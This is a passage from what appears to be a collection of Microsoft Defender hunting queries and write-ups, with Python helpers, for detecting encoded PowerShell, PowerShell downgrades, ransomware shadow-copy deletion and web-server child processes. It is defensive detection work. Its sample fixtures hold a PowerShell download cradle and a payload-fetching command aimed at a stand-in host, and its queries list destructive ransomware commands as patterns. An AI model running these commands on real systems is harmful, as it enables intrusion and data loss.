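    except UnicodeDecodeError:
        return "binary", None


def scan_command_line(cmdline: str) -> list:
    """Split the launch string on spaces (as the KQL does), report every long Base64 token and
    mark whether an -EncodedCommand style switch precedes it. The image name is never consulted,
    so a renamed powershell.exe is still caught."""
    tokens = cmdline.split(" ")
    hits = []
    for i, tok in enumerate(tokens):
        if not B64_TOKEN.match(tok):
            continue
        kind, text = decode_payload(tok)
        hits.append({
            "token": tok,
            "kind": kind,
            "decoded": text,
            "encoded_command": any(is_encoded_command_flag(t) for t in tokens[:i]),
        })
    return hits


def _ps_encode(script: str) -> str:
    """How the -EncodedCommand argument is built (UTF-16LE, then Base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample launch strings (assumed, not real telemetry).
SAMPLE_COMMAND_LINES = [
    # Renamed host binary, hidden window, encoded download cradle.
    "C:\\Users\\Public\\svc.exe -nop -w hidden -enc "
    + _ps_encode("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"),
    # Benign: a script run by path, nothing Base64-shaped on the line.
    "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
    # A Base64 blob that is a PE image rather than text.
    "cmd.exe /c echo "
    + base64.b64encode(b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00" + b"\x00" * 40).decode("ascii"),
]

if __name__ == "__main__":
    for line in SAMPLE_COMMAND_LINES:
        for hit in scan_command_line(line):
            print(hit["kind"], hit["encoded_command"], (hit["decoded"] or "")[:60])
```

Splitting on single spaces mirrors the query and therefore shares its blind spot: a payload passed as `-enc<token>` without whitespace, or wrapped in quotes, is not a separate token. Tune the 50-character floor to your environment; lowering it catches shorter one-liners at the cost of matching long GUIDs and hashes.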
## Query

```
DeviceProcessEvents
| where ProcessCommandLine matches regex @'(\s+-((?i)encod?e?d?c?o?m?m?a?n?d?|e|en|enc|ec)\s).*([A-Za-z0-9+/]{50,}[=]{0,2})'
// The payload is UTF-16LE; decoding as UTF-8 and removing the NUL bytes recovers ASCII scripts
| extend DecodedCommand = replace(@'\x00','', base64_decode_tostring(extract("[A-Za-z0-9+/]{50,}[=]{0,2}",0 , ProcessCommandLine)))
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | v | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Misconfiguration | | |
| Malware, component | | |

## Contributor info

**Contributor:** Michael Melone

**GitHub alias:** mjmelone

**Organization:** Microsoft

**Contact info:** @PowershellPoet

================================================
FILE: Execution/Detect PowerShell v2 Downgrade.md
================================================
# Detect PowerShell Downgrade

This query looks for PowerShell processes that load an older version of the System.Management.Automation libraries. Downgrading to PowerShell version 2 lets an attacker bypass protections added in later versions, such as script block logging and the Antimalware Scan Interface (AMSI) hooks. Some tools and scripts do this for backwards compatibility, so the technique is not inherently malicious; you will likely need to filter out the processes in your environment that legitimately use this capability for the query to be effective. The version pattern in the regex matches the .NET 2.0-era assembly paths (for example the `v2.0.50727` native image directory) that the v2 engine loads; a process launched with `-Version 2` is what usually produces them.
## Query

```
DeviceImageLoadEvents
| where InitiatingProcessFileName =~ 'powershell.exe'
    and FileName in~ ('system.management.automation.ni.dll','System.Management.Automation.dll')
    and FolderPath matches regex @"[12]\.(\d)+\.(\d)+\.(\d)+"
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | v | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |

## Contributor info

**Contributor:** Michael Melone

**GitHub alias:** mjmelone

**Organization:** Microsoft

**Contact info:** @PowershellPoet

================================================
FILE: Execution/ExecuteBase64DecodedPayload.txt
================================================
// Process executed from binary hidden in Base64 encoded file. Encoding malicious software is a
// technique to obfuscate files from detection.
// The first and second ProcessCommandLine components look for Python decoding base64
// The third and fourth ProcessCommandLine components look for the Bash/sh command-line base64 decoding tool
// (long and short option forms); the fifth one looks for Ruby decoding base64
DeviceProcessEvents
| where Timestamp > ago(14d)
| where ProcessCommandLine contains ".decode('base64')"
    or ProcessCommandLine contains ".b64decode("
    or ProcessCommandLine contains "base64 --decode"
    or ProcessCommandLine contains "base64 -d"
    or ProcessCommandLine contains ".decode64("
| project Timestamp , DeviceName , FileName , FolderPath , ProcessCommandLine , InitiatingProcessCommandLine
| top 100 by Timestamp

================================================
FILE: Execution/File Copy and Execution.md
================================================
# File Copy and Execution

This query identifies files that are copied to a device over SMB and then executed within a specified threshold. The default is 5 seconds, configurable by tweaking the value of ToleranceInSeconds. The chain is: an inbound connection on port 445, a logon from the same remote address, a file written by the System process (the SMB server runs in the kernel, so the writer is `System`), and a process started from that file path. The joins are keyed on DeviceId alone and the time windows are applied afterwards, so restrict each table to a short time range (for example `| where Timestamp > ago(1d)`) before running this in a large environment.

## Query

```
let ToleranceInSeconds = 5;
DeviceNetworkEvents
| where LocalPort == 445 and isnotempty(RemoteIP)
| join kind = inner DeviceLogonEvents on DeviceId
| where Timestamp1 between (Timestamp .. datetime_add('second',ToleranceInSeconds,Timestamp))
    and RemoteIP endswith RemoteIP1
| join kind=inner (
    DeviceFileEvents
    | where ActionType in ('FileModified','FileCreated')
        and (InitiatingProcessFileName =~ 'System' or InitiatingProcessFolderPath endswith "ntoskrnl.exe")
    ) on DeviceId
| where Timestamp2 between (Timestamp .. datetime_add('second',ToleranceInSeconds,Timestamp))
| join kind=inner DeviceProcessEvents on DeviceId, FolderPath
| where Timestamp3 between (Timestamp .. datetime_add('second',ToleranceInSeconds,Timestamp))
| project Timestamp, DeviceName, RemoteIP, RemotePort, AccountDomain, AccountName, AccountSid, Protocol, LogonId, RemoteDeviceName, IsLocalAdmin, FileName, FolderPath, SHA1, SHA256, MD5, ProcessCommandLine
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | v | |
| Persistence | v | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | v | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | v | |
| Vulnerability | | |
| Misconfiguration | | |
| Malware, component | | |

## Contributor info

**Contributor:** Michael Melone

**GitHub alias:** mjmelone

**Organization:** Microsoft

**Contact info:** @PowershellPoet

================================================
FILE: Execution/Malware_In_recyclebin.txt
================================================
// Finding attackers hiding malware in the recycle bin.
// Read more here: https://azure.microsoft.com/en-us/blog/how-azure-security-center-helps-reveal-a-cyberattack/
// Tags: #execution #SuspiciousPath
// ":\recycler" is the Windows XP / Server 2003 folder name; Vista and later use ":\$Recycle.Bin"
DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName in~('cmd.exe','ftp.exe','schtasks.exe','powershell.exe','rundll32.exe','regsvr32.exe','msiexec.exe')
| where ProcessCommandLine contains ":\\recycler" or ProcessCommandLine contains ":\\$recycle.bin"
| project Timestamp, DeviceName, ProcessCommandLine, InitiatingProcessFileName

================================================
FILE: Execution/Masquerading system executable.txt
================================================
//Finds legitimate system32 or syswow64 executables being run under a different name and in a different location
//The rule will require tuning for your environment
//MITRE: Masquerading https://attack.mitre.org/techniques/T1036/
//
//Get a list of all processes run, except those run from system32 or SysWOW64
let nonSystemProcesses = DeviceProcessEvents
| where Timestamp > ago(7d) //Adjust your desired date range here and set the data/time picker to 30 days
| where FolderPath !startswith @"C:\Windows\system32\" and FolderPath !startswith @"C:\Windows\SysWOW64\"
    and isnotempty(MD5) and FileName !in~ ("MpSigStub.exe","GACUtil_20.exe");
//Get a list of MD5s of all processes run from system32 or SysWOW64
let systemProcessHashes = DeviceProcessEvents
| where Timestamp > ago(30d) //Keep this at 30 days so it uses all available data to compile the list of hashes
//The parentheses matter: without them the `and` conditions only applied to the SysWOW64 branch
| where (FolderPath startswith @"C:\Windows\system32\" or FolderPath startswith @"C:\Windows\SysWOW64\")
    and isnotempty(MD5) and FileName !in~ ("fileacl.exe","WerFault.exe")
| summarize LegitFolderPath=make_set(tolower(FolderPath)) by MD5, LegitFileName=FileName;
//Join the two tables on MD5, where the filenames do not match
systemProcessHashes
| join kind=inner (nonSystemProcesses) on MD5
| where tolower(LegitFileName)!=tolower(FileName)
| project Timestamp, DeviceName, FileName, FolderPath, LegitFileName, LegitFolderPath, MD5, ProcessCommandLine, AccountName, InitiatingProcessFileName, InitiatingProcessParentFileName, ReportId, DeviceId
| top 100 by Timestamp desc

================================================
FILE: Execution/Possible Ransomware Related Destruction Activity.md
================================================
# Possible Ransomware Related Destruction Activity

This query identifies common processes run by ransomware to destroy volume shadow copies or clean free space on a drive so that files cannot be recovered after encryption. The query as written does not restrict on where the initiating process was launched from; to reduce false positives, consider appending a where clause that keeps only results whose initiating process ran from an unusual directory (for example user-writable paths), and drop it again if you prefer to see everything. Note that the `Win32_Shadowcopy` regex is case-sensitive, so a lower-cased class name in the script would evade the PowerShell branch.

Special thanks to Captain for additional inputs

## Query

```
DeviceProcessEvents
| where Timestamp > ago(7d)
| where (FileName =~ 'vssadmin.exe' and ProcessCommandLine has "delete shadows" and ProcessCommandLine has "/all" and ProcessCommandLine has "/quiet" ) // Clearing shadow copies
    or (FileName =~ 'cipher.exe' and ProcessCommandLine contains "/w") // Wiping drive free space
    or (FileName =~ 'schtasks.exe' and ProcessCommandLine has "/change" and ProcessCommandLine has @"\Microsoft\Windows\SystemRestore\SR" and ProcessCommandLine has "/disable") // Disabling system restore task
    or (FileName =~ 'fsutil.exe' and ProcessCommandLine has "usn" and ProcessCommandLine has "deletejournal" and ProcessCommandLine has "/d") // Deleting USN journal
    or (FileName =~ 'icacls.exe' and ProcessCommandLine has @'"C:\*"' and ProcessCommandLine contains '/grant Everyone:F') // Attempts to re-ACL all files on the C drive to give everyone full control
    or (FileName =~ 'powershell.exe' and (
            // Encoded command that deletes shadow copies through WMI
            (ProcessCommandLine matches regex @'\s+-((?i)encod?e?d?c?o?m?m?a?n?d?|e|en|enc|ec)\s+'
                and replace(@'\x00','', base64_decode_tostring(extract("[A-Za-z0-9+/]{50,}[=]{0,2}",0 , ProcessCommandLine))) matches regex @".*(Win32_Shadowcopy).*(.Delete\(\)).*")
            // Plain-text PowerShell command that deletes shadow copies through WMI
            or ProcessCommandLine matches regex @".*(Win32_Shadowcopy).*(.Delete\(\)).*"
        ))
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | v | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | v | |
| Vulnerability | | |
| Misconfiguration | | |
| Malware, component | | |

## Contributor info

**Contributor:** Michael Melone, with special thanks to Captain and @kshitijk_

**GitHub alias:** mjmelone

**Organization:** Microsoft

**Contact info:** @PowershellPoet

================================================
FILE: Execution/PowerShell downloads.txt
================================================
// Finds PowerShell execution events that could involve a download.
DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName in~ ("powershell.exe", "powershell_ise.exe")
| where ProcessCommandLine has "Net.WebClient"
    or ProcessCommandLine has "DownloadFile"
    or ProcessCommandLine has "Invoke-WebRequest"
    or ProcessCommandLine has "Invoke-Shellcode"
    or ProcessCommandLine has "http"
    or ProcessCommandLine has "IEX"
    or ProcessCommandLine has "Start-BitsTransfer"
    or ProcessCommandLine has "mpcmdrun.exe"
| project Timestamp, DeviceName, InitiatingProcessFileName, FileName, ProcessCommandLine
| top 100 by Timestamp

================================================
FILE: Execution/PowershellCommand - uncommon commands on machine.txt
================================================
// Find which uncommon Powershell Cmdlets were executed on that machine in a certain time period.
// This covers all Powershell commands executed in the Powershell engine by any process.
// The variable is named targetDeviceId so that it cannot be confused with the DeviceId column in the filter below.
let targetDeviceId = "474908f457a1dc4c1fab568f808d5f77bf3bb951";
let timestamp = datetime(2018-06-09T02:23:26.6832917Z);
// Query for Powershell cmdlets
let powershellCommands = DeviceEvents
| where ActionType == "PowerShellCommand"
// Extract the powershell command name from the Command field in the AdditionalFields JSON column
| project PowershellCommand=extractjson("$.Command", AdditionalFields, typeof(string)), InitiatingProcessCommandLine, InitiatingProcessParentFileName, Timestamp, DeviceId
| where PowershellCommand !endswith ".ps1" and PowershellCommand !endswith ".exe";
// Filter Powershell cmdlets executed on the relevant machine and time period
// (the window runs from 5 minutes before to 5 minutes after the pivot timestamp)
powershellCommands
| where DeviceId == targetDeviceId and Timestamp between ((timestamp-5min) .. 10min)
// Filter out common powershell cmdlets
| join kind=leftanti (powershellCommands | summarize MachineCount=dcount(DeviceId) by PowershellCommand | where MachineCount > 20) on PowershellCommand
// To learn more about queries on Powershell commands, take a look at this post: https://techcommunity.microsoft.com/t5/Threat-Intelligence/Hunting-tip-of-the-month-PowerShell-commands/m-p/210898#M30
// Related queries:
// 1. Found a suspicious command? Let's pivot to see on which other machines it was executed:
// https://github.com/Microsoft/WindowsDefenderATP-Hunting-Queries/blob/master/Execution/PowershellCommand%20footprint.txt
// 2. We know typing an exact timestamp could be annoying...
// Why not query for the timestamp of the event you're looking for instead?
// For example, when investigating an alert, look for the powershell commands executed around the time of the first event detected in that alert.
// https://github.com/Microsoft/WindowsDefenderATP-Hunting-Queries/blob/master/General%20queries/Events%20surrounding%20alert.txt

================================================
FILE: Execution/PowershellCommand footprint.txt
================================================
// Find all machines running a given Powershell cmdlet.
// This covers all Powershell commands executed in the Powershell engine by any process.
let powershellCommandName = "Invoke-RickAscii";
DeviceEvents
| where ActionType == "PowerShellCommand"
// This filter improves query performance, as it avoids needing to parse Command from all rows and only then applying a filter
| where AdditionalFields contains powershellCommandName
// Extract the powershell command name from the Command field in the AdditionalFields JSON column
| project PowershellCommand=extractjson("$.Command", AdditionalFields, typeof(string)), InitiatingProcessCommandLine, InitiatingProcessParentFileName, Timestamp, DeviceId
// Do an exact case-insensitive match on the command name field
| where PowershellCommand =~ powershellCommandName
// To learn more about queries on Powershell commands, take a look at this post: https://techcommunity.microsoft.com/t5/Threat-Intelligence/Hunting-tip-of-the-month-PowerShell-commands/m-p/210898#M30
// Related query - find uncommon Powershell commands executed on a machine in a certain time-range:
// https://github.com/Microsoft/WindowsDefenderATP-Hunting-Queries/blob/master/Execution/PowershellCommand%20-%20uncommon%20commands%20on%20machine.txt

================================================
FILE: Execution/Webserver Executing Suspicious Applications.md
================================================
# Webserver Executing Suspicious Applications

This query looks for common web server process names and identifies any child processes launched using a scripting language (cmd, powershell, wscript, cscript), common initial profiling commands (net / net1 / whoami / ping / ipconfig), or admin commands (sc). Seeing this activity doesn't immediately mean you have a breach, though you might consider reviewing and honing the where clause to fit your specific web applications. Those who don't mind false positives should consider also adding database process names to the list (for example, sqlservr.exe) to identify potential abuse of xp_cmdshell.
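The web server child-process hunt described above, as an added Python example over constructed `DeviceProcessEvents` rows (not repository code). It ranks the spawned command lines rarest first, the way the query's ascending `order by` does, and adds the per-application allowlist the description suggests as a tuning knob; the allowlist entries, host names and command lines are this example's assumptions.

```python
# Added example, not part of the repository: children of web server processes, rarest first.
from collections import Counter

# Parent processes the query treats as web servers; add "sqlservr.exe" to also catch xp_cmdshell abuse.
WEB_SERVER_PROCESSES = {"w3wp.exe", "httpd.exe"}
# Children worth looking at: script hosts, profiling commands and service control.
SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe", "cscript.exe", "wscript.exe", "net.exe", "net1.exe",
                       "ping.exe", "whoami.exe", "ipconfig.exe", "sc.exe"}
# Assumed per-application tuning: command-line prefixes a given web server is known to run
# legitimately. Constructed for this example; the query itself has no allowlist.
KNOWN_GOOD_PREFIXES = {
    "w3wp.exe": ('cmd.exe /c "C:\\inetpub\\app\\tools\\healthcheck.cmd"',),
}


def web_server_child_processes(events, servers=WEB_SERVER_PROCESSES, children=SUSPICIOUS_CHILDREN,
                               allowlist=KNOWN_GOOD_PREFIXES):
    """Instances of (ProcessCommandLine, FolderPath, DeviceName) spawned by a web server process,
    rarest first, skipping command lines allowlisted for that parent."""
    counts = Counter()
    for e in events:
        parent = e["InitiatingProcessFileName"].lower()
        if parent not in servers or e["FileName"].lower() not in children:
            continue
        cmd = e["ProcessCommandLine"]
        if any(cmd.lower().startswith(prefix.lower()) for prefix in allowlist.get(parent, ())):
            continue
        counts[(cmd, e["FolderPath"], e["DeviceName"])] += 1
    # Sort by count, then by the tuple itself so the order is deterministic.
    return sorted(counts.items(), key=lambda item: (item[1], item[0]))


def _proc(device, parent, name, folder, cmdline):
    return {"DeviceName": device, "InitiatingProcessFileName": parent, "FileName": name,
            "FolderPath": folder, "ProcessCommandLine": cmdline}


SYS32 = "C:\\Windows\\System32\\"
# Constructed sample: a scheduled health check that fires often, two one-off recon/download
# commands under the IIS worker process, and two rows that must not match.
SAMPLE_EVENTS = (
    [_proc("WEB01", "w3wp.exe", "cmd.exe", SYS32 + "cmd.exe",
           'cmd.exe /c "C:\\inetpub\\app\\tools\\healthcheck.cmd" --quiet') for _ in range(20)]
    + [_proc("WEB01", "w3wp.exe", "cmd.exe", SYS32 + "cmd.exe", "cmd.exe /c whoami /all"),
       _proc("WEB01", "w3wp.exe", "powershell.exe", SYS32 + "WindowsPowerShell\\v1.0\\powershell.exe",
             'powershell.exe -nop -c "Invoke-WebRequest http://example.invalid/x -OutFile C:\\Windows\\Temp\\x.exe"'),
       _proc("WEB01", "explorer.exe", "cmd.exe", SYS32 + "cmd.exe", "cmd.exe /c whoami"),   # parent is not a web server
       _proc("WEB02", "httpd.exe", "notepad.exe", SYS32 + "notepad.exe", "notepad.exe")]    # child not in the watch list
)

if __name__ == "__main__":
    for (cmdline, folder, device), n in web_server_child_processes(SAMPLE_EVENTS):
        print(n, device, cmdline)
```

With the allowlist in place only the two one-off commands remain; without it the health check shows up too, but at the bottom of the list with a count of 20, which is the point of sorting ascending: a web shell operator's first `whoami` is a singleton, the application's own scheduled job is not.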
## Query

```
DeviceProcessEvents
| where Timestamp > ago(7d)
| where InitiatingProcessFileName in~ ('w3wp.exe', 'httpd.exe') // 'sqlservr.exe')
// ipconfig.exe and sc.exe are included to match the description above
| where FileName in~ ('cmd.exe', 'powershell.exe', 'cscript.exe', 'wscript.exe', 'net.exe', 'net1.exe', 'ping.exe', 'whoami.exe', 'ipconfig.exe', 'sc.exe')
| summarize instances = count() by ProcessCommandLine, FolderPath, DeviceName, DeviceId
| order by instances asc
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | v | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Misconfiguration | | |
| Malware, component | | |

## Contributor info

**Contributor:** Michael Melone

**GitHub alias:** mjmelone

**Organization:** Microsoft

**Contact info:** @PowershellPoet

================================================
FILE: Execution/check-for-shadowhammer-activity-implant.md
================================================
# Check for ShadowHammer-related implant or container activity

This query was originally published in the threat analytics report, *ShadowHammer supply chain attack*

[Operation ShadowHammer](https://www.vice.com/en_us/article/pan9wn/hackers-hijacked-asus-software-updates-to-install-backdoors-on-thousands-of-computers) was an attack against ASUS computer hardware, using the company's own update infrastructure to deliver malware to the company's products. The campaign ran from June to November, 2018. ASUS has since [responded](https://www.asus.com/News/hqfgVUyZ6uyAyJe1) with updates that protect their Live Update system, and diagnostic tools to check affected systems.
The following query checks for activity associated with the ShadowHammer implant or container over the past 30 days.

## Query

```
// Event types that may be associated with the implant or container
union DeviceProcessEvents , DeviceNetworkEvents , DeviceFileEvents , DeviceImageLoadEvents
| where Timestamp > ago(30d)
// File SHAs for implant and container
| where InitiatingProcessSHA1 in("e01c1047001206c52c87b8197d772db2a1d3b7b4", "e005c58331eb7db04782fdf9089111979ce1406f", "69c08086c164e58a6d0398b0ffdcb957930b4cf2")
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|-|-|-|
| Initial access | | |
| Execution | v | |
| Persistence | v | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | v | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Misconfiguration | | |
| Malware, component | | |

## Contributor info

**Contributor:** Microsoft Threat Protection team

================================================
FILE: Execution/detect-anomalous-process-trees.md
================================================
# Detect anomalous process trees

This query generates process trees for given processes and performs anomaly detection on them. It builds trees up to the 7th level by joining DeviceProcessEvents to itself on `(DeviceId, ProcessId, ProcessCreationTime)`, counts how often each sequence of process names occurs, and reports the sequences seen fewer than a threshold number of times. The query can be used as a template to perform anomaly detection on specific processes like winword.exe, powerpnt.exe, w3wp.exe, etc. The query runs without any performance issues in large environments.
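The same tree-building and rarity counting, as an added Python example over constructed `DeviceProcessEvents` rows (not the author's code; the sample devices, names and timestamps are made up). The KQL walks down from the selected parent through five self-joins; this version walks up from every process through the `InitiatingProcess*` columns and keeps the chains that pass through a selected process, which yields the same name tuples. Chains stop where the parent's own row is missing, exactly as the `leftouter` joins produce nulls for parents that started before the timeframe.

```python
# Added example, not part of the repository: rare process-ancestry chains under Office/PDF readers.
from collections import Counter
from datetime import datetime, timedelta

SELECTED_PROCESSES = {"winword.exe", "excel.exe", "powerpnt.exe", "acrord32.exe",
                      "foxitphantompdf.exe", "microsoftpdfreader.exe", "sumatrapdf.exe"}


def build_index(events):
    """Key each row the way the KQL joins do: (DeviceId, ProcessId, ProcessCreationTime).
    PIDs are reused, so the creation time is what makes the key unique."""
    return {(e["DeviceId"], e["ProcessId"], e["ProcessCreationTime"]): e for e in events}


def ancestry(event, index, depth=7):
    """Name chain (process, parent, grandparent, ...) of up to `depth` entries. Each hop reads the
    InitiatingProcess* columns of the current row, then looks the parent's own row up to continue;
    if that row is outside the timeframe the chain simply ends there."""
    chain = [event["FileName"].lower()]
    current = event
    while len(chain) < depth and current.get("InitiatingProcessFileName"):
        chain.append(current["InitiatingProcessFileName"].lower())
        current = index.get((current["DeviceId"], current["InitiatingProcessId"],
                             current["InitiatingProcessCreationTime"]))
        if current is None:
            break
    return tuple(chain)


def rare_process_trees(events, selected=SELECTED_PROCESSES, depth=7, threshold=10):
    """(chain, count) for every chain hanging under a selected process that occurs fewer than
    `threshold` times in the whole dataset; the KQL's `where count_ < 10`."""
    index = build_index(events)
    chains = [ancestry(e, index, depth) for e in events]
    chains = [c for c in chains if any(name in selected for name in c[1:])]
    counts = Counter(chains)
    return sorted((c, n) for c, n in counts.items() if n < threshold)


def _event(device, name, pid, t, parent_name, parent_pid, parent_t):
    return {"DeviceId": device, "FileName": name, "ProcessId": pid, "ProcessCreationTime": t,
            "InitiatingProcessFileName": parent_name, "InitiatingProcessId": parent_pid,
            "InitiatingProcessCreationTime": parent_t}


def make_sample_events():
    """Constructed data: 12 devices where Word prints through splwow64.exe (normal), plus one
    device where Word spawns cmd -> powershell -> rundll32 (the anomaly). userinit.exe rows predate
    the timeframe, so explorer.exe's parent is known by name only."""
    t0 = datetime(2021, 9, 1, 9, 0, 0)
    events = []
    for i in range(1, 13):
        dev, boot = f"dev-{i:02d}", t0 + timedelta(minutes=i)
        events.append(_event(dev, "explorer.exe", 1000, boot, "userinit.exe", 900, boot - timedelta(seconds=5)))
        events.append(_event(dev, "WINWORD.EXE", 2000, boot + timedelta(minutes=1), "explorer.exe", 1000, boot))
        events.append(_event(dev, "splwow64.exe", 3000, boot + timedelta(minutes=2),
                             "WINWORD.EXE", 2000, boot + timedelta(minutes=1)))
    boot = t0 + timedelta(minutes=1)  # dev-01
    word_t = boot + timedelta(minutes=1)
    events.append(_event("dev-01", "cmd.exe", 4000, boot + timedelta(minutes=3), "WINWORD.EXE", 2000, word_t))
    events.append(_event("dev-01", "powershell.exe", 4100, boot + timedelta(minutes=3, seconds=1),
                         "cmd.exe", 4000, boot + timedelta(minutes=3)))
    events.append(_event("dev-01", "rundll32.exe", 4200, boot + timedelta(minutes=3, seconds=2),
                         "powershell.exe", 4100, boot + timedelta(minutes=3, seconds=1)))
    # A rare tree that is not under a selected process and must not be reported.
    events.append(_event("dev-01", "svchost.exe", 5000, boot + timedelta(minutes=4),
                         "services.exe", 700, boot - timedelta(seconds=10)))
    return events


if __name__ == "__main__":
    for chain, n in rare_process_trees(make_sample_events()):
        print(n, " <- ".join(chain))
```

The three reported chains are the `cmd.exe`, `powershell.exe` and `rundll32.exe` descendants of Word on `dev-01`; the twelve `splwow64.exe` chains fall above the threshold and the `svchost.exe` singleton is ignored because nothing in its ancestry is a selected process. Raising the threshold to the size of the fleet turns the function into a quick inventory of every tree shape, which is a reasonable first step before choosing a threshold for a new process.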
Detailed explanation can be found [here](https://mergene.medium.com/detecting-threats-with-process-tree-analysis-without-machine-learning-838d85f78b2c)

## Query

```Kusto
let timeframe = 48h;
// Define of which processes you want to generate process tree
let _selected_processes = dynamic(["winword.exe","excel.exe","powerpnt.exe","acrord32.exe", "FoxitPhantomPDF.exe","MicrosoftPdfReader.exe","SumatraPDF.exe"]);
// First, generate the process tree and store it in the cache.
// Renaming fields accordingly to generate a tree up to 7th level
// In each step, project only the required fields to optimize resource usage
let _process_tree_data= materialize (
DeviceProcessEvents
| where Timestamp > ago(timeframe)
| where InitiatingProcessFileName in~ (_selected_processes )
| project DeviceId,DeviceName, InitiatingProcessG3ParentFileName=FileName,InitiatingProcessG3ParentSHA1=SHA1,InitiatingProcessG3ParentId=ProcessId, InitiatingProcessG3ParentCommandLine=ProcessCommandLine,InitiatingProcessG3ParentCreationTime=todatetime(ProcessCreationTime),
    InitiatingProcessG4ParentFileName=InitiatingProcessFileName,InitiatingProcessG4ParentSHA1=InitiatingProcessSHA1,InitiatingProcessG4ParentId=InitiatingProcessId,InitiatingProcessG4ParentCommandLine=InitiatingProcessCommandLine, InitiatingProcessG4ParentCreationTime=todatetime(InitiatingProcessCreationTime)
// Start iteration
// 1st iteration of join. From now on, query all processes, rename fields, and join accordingly
| join kind=leftouter (
    DeviceProcessEvents
    | where Timestamp > ago(timeframe)
    | project DeviceId, InitiatingProcessG2ParentFileName=FileName,InitiatingProcessG2ParentFolderPath=FolderPath,InitiatingProcessG2ParentSHA1=SHA1, InitiatingProcessG2ParentId=ProcessId, InitiatingProcessG2ParentCommandLine=ProcessCommandLine, InitiatingProcessG2ParentCreationTime=todatetime(ProcessCreationTime),
        InitiatingProcessG3ParentFileName=InitiatingProcessFileName,InitiatingProcessG3ParentFolderPath=InitiatingProcessFolderPath,InitiatingProcessG3ParentSHA1=InitiatingProcessSHA1, InitiatingProcessG3ParentId=InitiatingProcessId, InitiatingProcessG3ParentCommandLine=InitiatingProcessCommandLine, InitiatingProcessG3ParentCreationTime=todatetime(InitiatingProcessCreationTime)
    ) on DeviceId , InitiatingProcessG3ParentFileName, InitiatingProcessG3ParentId, InitiatingProcessG3ParentCreationTime
// 2nd iteration of join.
| join kind=leftouter (
    DeviceProcessEvents
    | where Timestamp > ago(timeframe)
    | project DeviceId, InitiatingProcessG1ParentFileName=FileName,InitiatingProcessG1ParentFolderPath=FolderPath,InitiatingProcessG1ParentSHA1=SHA1, InitiatingProcessG1ParentId=ProcessId, InitiatingProcessG1ParentCommandLine=ProcessCommandLine, InitiatingProcessG1ParentCreationTime=todatetime(ProcessCreationTime),
        InitiatingProcessG2ParentFileName=InitiatingProcessFileName,InitiatingProcessG2ParentFolderPath=InitiatingProcessFolderPath,InitiatingProcessG2ParentSHA1=InitiatingProcessSHA1, InitiatingProcessG2ParentId=InitiatingProcessId, InitiatingProcessG2ParentCommandLine=InitiatingProcessCommandLine, InitiatingProcessG2ParentCreationTime=todatetime(InitiatingProcessCreationTime)
    ) on DeviceId , InitiatingProcessG2ParentFileName , InitiatingProcessG2ParentId, InitiatingProcessG2ParentCreationTime
// 3rd iteration of join.
| join kind=leftouter (
    DeviceProcessEvents
    | where Timestamp > ago(timeframe)
    | project DeviceId, InitiatingProcessParentFileName=FileName,InitiatingProcessParentFolderPath=FolderPath,InitiatingProcessParentSHA1=SHA1, InitiatingProcessParentId=ProcessId, InitiatingProcessParentCommandLine=ProcessCommandLine, InitiatingProcessParentCreationTime=ProcessCreationTime,
        InitiatingProcessG1ParentFileName=InitiatingProcessFileName,InitiatingProcessG1ParentFolderPath=InitiatingProcessFolderPath,InitiatingProcessG1ParentSHA1=InitiatingProcessSHA1, InitiatingProcessG1ParentId=InitiatingProcessId, InitiatingProcessG1ParentCommandLine=InitiatingProcessCommandLine, InitiatingProcessG1ParentCreationTime=todatetime(InitiatingProcessCreationTime)
